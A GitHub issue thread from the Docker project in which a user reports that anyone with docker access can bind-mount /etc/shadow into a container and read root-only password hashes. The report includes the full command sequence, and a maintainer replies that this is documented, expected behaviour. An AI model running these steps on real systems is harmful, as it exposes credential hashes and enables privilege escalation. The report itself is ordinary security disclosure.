### ISSUE TITLE
Easy linux privilege escalation with docker

### ISSUE THREAD

**Issue by Gronan** [docker/docker#31763]
**Description**
I guess it's more a LXC problem but Docker make root files accessible (w & r) for any users who can acces docker

**Steps to reproduce the issue:**
as any non-root user with access to the docker command:
1. Log as root to create a file as exemple : `sudo su` 
2. `touch test.txt && chmod 600 test.txt`
3. Log out to make sure you don't have access to the file : `exit`
4. `cat test.txt `
`cat: test.txt: Permission denied`
5. `docker run -v $PWD/test.txt:/docker/test.txt -v /etc/shadow:/docker/hashedpasswords -d postgres `
6. `docker exec -ti {CONTAINER_ID} bash`
7. `cat /docker/hashedpasswords > /docker/test.txt`
8. `chmod 777 /docker/test.txt`
9. `exit`
10. `cat test.txt`

**Describe the results you received:**
the **/etc/shadow** content

**Describe the results you expected:**
cat: test.txt: Permission denied

**Additional information you deem important (e.g. issue happens only occasionally):**
Work, at least, with postgres image, node and I suppose, any images.
I let you guess what malicious code running as non-root user with docker can do on **/etc/pam.d/common-password**, **/etc/crontab**... 

**Output of `docker version`:**

```
Client:
 Version:      1.13.1
 API version:  1.26
 Go version:   go1.7.5
 Git commit:   092cba3
 Built:        Wed Feb  8 06:50:14 2017
 OS/Arch:      linux/amd64

Server:
 Version:      1.13.1
 API version:  1.26 (minimum version 1.12)
 Go version:   go1.7.5
 Git commit:   092cba3
 Built:        Wed Feb  8 06:50:14 2017
 OS/Arch:      linux/amd64
 Experimental: false

```

**Output of `docker info`:**

```
Containers: 22
 Running: 2
 Paused: 0
 Stopped: 20
Images: 16
Server Version: 1.13.1
Storage Driver: aufs
 Root Dir: /var/lib/docker/aufs
 Backing Filesystem: extfs
 Dirs: 152
 Dirperm1 Supported: true
Logging Driver: json-file
Cgroup Driver: cgroupfs
Plugins: 
 Volume: local
 Network: bridge host macvlan null overlay
Swarm: inactive
Runtimes: runc
Default Runtime: runc
Init Binary: docker-init
containerd version: aa8187dbd3b7ad67d8e5e3a15115d3eef43a7ed1
runc version: 9df8b306d01f59d3a8029be411de015b7304dd8f
init version: 949e6fa
Security Options:
 apparmor
 seccomp
  Profile: default
Kernel Version: 4.4.0-66-generic
Operating System: Ubuntu 16.04.2 LTS
OSType: linux
Architecture: x86_64
CPUs: 8
Total Memory: 7.742 GiB
Name: Qiraji
ID: 6CJK:KWIP:JU3A:WLFY:27PL:HNRW:T4UD:ESEX:YHS5:P6L5:OASH:6L5B
Docker Root Dir: /var/lib/docker
Debug Mode (client): false
Debug Mode (server): false
Registry: https://index.docker.io/v1/
WARNING: No swap limit support
Experimental: false
Insecure Registries:
 127.0.0.0/8
Live Restore Enabled: false
```

**Additional environment details (AWS, VirtualBox, physical, etc.):**
Ubuntu 16.04

**Comment by cpuguy83** [comment]
This is expected behavior.
As outlined in the docs, access to the docker socket is akin to root access to the system.
You can write authorization middleware to limit this further.

See https://docs.docker.com/engine/installation/linux/linux-postinstall/ which warns about giving users unauthenticated access to the docker socket as well as the attack surface detailed here: https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface 

Thanks for reporting.
Even though this isn't really an issue, in the future any security-sensitive bug reports should be responsibly disclosed to security@docker.com rather than on a public forum.

Thanks again!
